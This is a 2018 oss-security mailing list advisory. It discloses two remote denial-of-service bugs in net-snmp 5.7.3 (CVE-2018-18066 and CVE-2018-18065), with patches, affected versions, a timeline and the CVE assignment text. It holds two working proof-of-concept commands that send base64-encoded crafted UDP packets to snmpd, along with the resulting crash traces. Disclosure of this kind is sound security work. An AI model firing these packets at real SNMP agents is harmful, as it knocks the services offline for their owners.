Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-Id: <EC9F9CC1-4943-4CD5-8463-F40DF6BCA886@stubman.eu>
Date: Mon, 8 Oct 2018 20:46:29 +0200
From: Magnus Klaaborg Stubman <magnus@...bman.eu>
To: oss-security@...ts.openwall.com
Subject: net-snmp 5.7.3 unauthenticated remote Denial of Service (exploit
 available)

Reference: https://dumpco.re/blog/net-snmp-5.7.3-remote-dos

2018-10-08

NET-SNMP REMOTE DOS
===================

Back in january I did some vulnerability research of net-snmp 5.7.3 and found some bugs. 
Here they are:

VULN#1 CVE-2018-18066
=====================

First bug is remotely exploitable without knowledge of the community string, and leads to Denial of Service:

  # echo -n "MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBwbwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBAChWQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEHCobetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41810==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007f261b bp 0x7fff34754550 sp 0x7fff34754220 T0)
      #0 0x7f261a in snmp_oid_compare /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470:13
      #1 0x7f261a in _snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4247
      #2 0x7f261a in snmp_parse /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:4336
      #3 0x7f261a in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5241
      #4 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #5 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #6 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #7 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #8 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #9 0x7f2561efeb44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #10 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:6470 snmp_oid_compare
  ==41810==ABORTING


Same configuration for both bugs:

  magnus@...b0x:~/projects/net-snmp$ cat snmpd.conf
  rocommunity public  default    -V systemonly
  rocommunity public  localhost    -V systemonly
  rouser   authOnlyUser
  syslocation  "On the Desk"
  syscontact  Me <me@...mple.org>

VULN#2 CVE-2018-18065
=====================

Second bug is remotely exploitable only with knowledge of the community string (in this case "public") leading to Denial of Service:

  # echo -n "MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIuMzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQNMjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y" | base64 -d > /dev/udp/127.0.0.1/1111

  # net-snmp-5.7.3/agent/snmpd -f -d -V -c ../../snmpd.conf -Ln  127.0.0.1:1111
  ASAN:SIGSEGV
  =================================================================
  ==41062==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000410 (pc 0x00000075bc0f bp 0x7ffdda226b10 sp 0x7ffdda2269e0 T0)
      #0 0x75bc0e in _set_key /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564:9
      #1 0x75bc0e in _data_lookup /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:614
      #2 0x75bc0e in _container_table_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:749
      #3 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #4 0x572dc4 in netsnmp_call_next_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:640:12
      #5 0x58751c in table_helper_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table.c:713:9
      #6 0x572262 in netsnmp_call_handler /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:526:15
      #7 0x572c79 in netsnmp_call_handlers /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/agent_handler.c:611:14
      #8 0x520d86 in handle_var_requests /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:2679:22
      #9 0x524dbe in handle_pdu /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3441:18
      #10 0x51b976 in netsnmp_handle_request /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:3284:14
      #11 0x515876 in handle_snmp_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmp_agent.c:1990:10
      #12 0x7f3558 in _sess_process_packet /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5437:7
      #13 0x7ef331 in _sess_read /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5877:14
      #14 0x7ed2e0 in snmp_sess_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5911:10
      #15 0x7ed2e0 in snmp_read2 /home/magnus/projects/net-snmp/net-snmp-5.7.3/snmplib/snmp_api.c:5502
      #16 0x4f9286 in receive /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1375:15
      #17 0x4f9286 in main /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd.c:1118
      #18 0x7fc1acb11b44 in __libc_start_main /build/glibc-6V9RKT/glibc-2.19/csu/libc-start.c:287
      #19 0x4f617c in _start (/home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/snmpd+0x4f617c)

  AddressSanitizer can not provide additional info.
  SUMMARY: AddressSanitizer: SEGV /home/magnus/projects/net-snmp/net-snmp-5.7.3/agent/helpers/table_container.c:564 _set_key
  ==41062==ABORTING


PATCHES
=======

Update to net-snmp-5.8 or apply the following patches:

Vuln#1: sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
Vuln#2: sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d

AFFECTED
========

- 5.7.3
- 5.5.2.1
- 5.6.2.1

More versions may be affected as well.

TIMELINE
========

2015-04-11 Vendor releases patch of bug#1 in version control - no public article or otherwise disclosure
2016-10-06 Vendor releases patch of bug#2 in version control - no public article or otherwise disclosure
2018-01-05 I discovered both bugs
2018-01-08 Vendor notified
2018-01-08 Vendor responds - bugs already fixed in version control repo
2018-10-08 Public disclosure of exploit
2018-10-08 CVE-ID assignment


PROOF OF DISCOVERY
==================

  # cat vuln1 | base64
  MIG1AgEDMBECBACeXRsCAwD/4wQBBQIBAwQvMC0EDYAAH4iAWdxIYUWiYyICAQgCAgq5BAVwaXBw
  bwQMBVsKohj9MlusDerWBAAwbAQFgAAAAAYEAKFZAgQsGA29AgEAAgEAMEswDQEEAWFFg2MiBACh
  WQIELBgNvQIBAAIBADBLMA0GCSsGAQIBAgI1LjI1NS4wMCEGEisGNS4yNTUuMAEEAYF9CDMKAgEH
  CobetzgECzE3Mi4zMS4xOS4y
  # sha256sum vuln1
  b2ff63c97c705c25c0043758cbd7b1e00cb5692ba1223712a17461082a047125  vuln1
  twitter.com/magnusstubman/status/949520650762358789

  # cat vuln2 | base64
  MIGfAgEBBAZwdWJsaWOhgZECATwCAQECAUAwgYUwIgYSKwYBBAGBfQgzCgIBBwqG3rc1BAwxNzIu
  MzEuMTkuNzMwFwYSKwYBAgEBCQEEgQECAAqG3rlgAgECMCMGEgsGAQQBgX0IMwoCAQcKht63NgQN
  MjU1LjI1NS4yNTUuMDAhBhIrBgECAQEJBgECAQoDAIbetzgECzE3Mi4zMS4xOS4y
  # sha256sum vuln2
  b7f0e494b8a91c6fedb7e13b3b8dab68a951b5fdc21dd876ae91eb86924018f2  vuln2
  twitter.com/magnusstubman/status/949520565064404994


REFERENCES
==========

- sourceforge.net/p/net-snmp/bugs/2820
- sourceforge.net/p/net-snmp/bugs/2819


CVE ASSIGNMENTS
===============

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

> [Suggested description]
> _set_key in agent/helpers/table_container.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> authenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (Null Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
> dumpco.re/blog/net-snmp-5.7.3-remote-dos
> sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true

Use CVE-2018-18065.


> [Suggested description]
> snmp_oid_compare in snmplib/snmp_api.c in
> Net-SNMP before 5.8
> has a NULL Pointer Exception bug that can be used by an
> unauthenticated attacker to remotely cause the instance to crash via a crafted UDP packet,
> resulting in Denial of Service.
>
> ------------------------------------------
>
> [Additional Information]
> Proof of concept exploit are publicly available at dumpco.re/blog/net-snmp-5.7.3-remote-dos
>
> ------------------------------------------
>
> [VulnerabilityType Other]
> Remote Denial of Service (NULL Pointer Exception)
>
> ------------------------------------------
>
> [Vendor of Product]
> net-snmp
>
> ------------------------------------------
>
> [Affected Product Code Base]
> net-snmp - vulnerable: 5.7.3, 5.5.2.1, 5.6.2.1. Fixed in: 5.8
>
> ------------------------------------------
>
> [Affected Component]
> snmpd
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> A crafted UDP packet must be sent to the target.
>
> ------------------------------------------
>
> [Reference]
> dumpco.re/blog/net-snmp-5.7.3-remote-dos
> sourceforge.net/p/net-snmp/code/ci/f23bcd3ac6ddee5d0a48f9703007ccc738914791
> sourceforge.net/p/net-snmp/code/ci/7ffb8e25a0db851953155de91f0170e9bf8c457d
>
> ------------------------------------------
>
> [Has vendor confirmed or acknowledged the vulnerability?]
> true

Use CVE-2018-18066.


- --
CVE Assignment Team
M/S M300, 202 Burlington Road, Bedford, MA 01730 USA
[ A PGP key is available for encrypted communications at
  cve.mitre.org/cve/request_id.html ]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJbu5sQAAoJEA2h+fVryJLo8M0P/0PHKRFRLetcB4kLwkzX3Rbo
Hr2FVj83nQEFpbU+R94bhneu1ee54zGTBFnQj6FRqEFgrK4xWE8EwNdrshQSbcRZ
bjPXA/SneIqZlg//Btpa/4HljWgLlwKYoQQD3MzzmuO72yfkfRESOhXpKZLcUP8b
YDATpZERG8oY4TA7zDNj2d3L98U18CcBhNrlBPmEtUnrJcCjsklZM6Cbw0x1DHa1
vBoB2HSJH94Cnl4603vJhrUn7ZAxkuAManul0pTVLhPSryBc4uNptUkWEU2aU9xp
1wvwpsy7syWhlTgJhwH2Gt8EEQxDHFer4AhatkYdjX8hw+SAYoFBDIEQxqPYgu+2
NamzJl6l8NXruw9YzkJhpWpYFusBEikOVHeJoUYGoSZISACduLTmVCne2Axb2Vkg
USjP4jyYi7ZFMVd4uNkEnIUzjJmpKXBGkPqb9VktEAMaLLBgHPJI4ZFuyEYxzU0M
VLKu7ZEu66QvS5vLFEPQcQQPbFrwYMlS4QyCc4KrwyojSWkObX5j9mrLBsb42OQU
B+ilV27e+wJu1kA9hMLHfTT1/AV48JyyVDk5T7SGiVr3sho7HodWFW+Mc5UCgz38
e/ERoBUpod82bmFuQQSdbrDXVfKloyV9h909YJJkL7w37CABHoeySB/ejcDh9ZCJ
5R0qeB5HVvtNE8xM5Oej
=WaAB
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.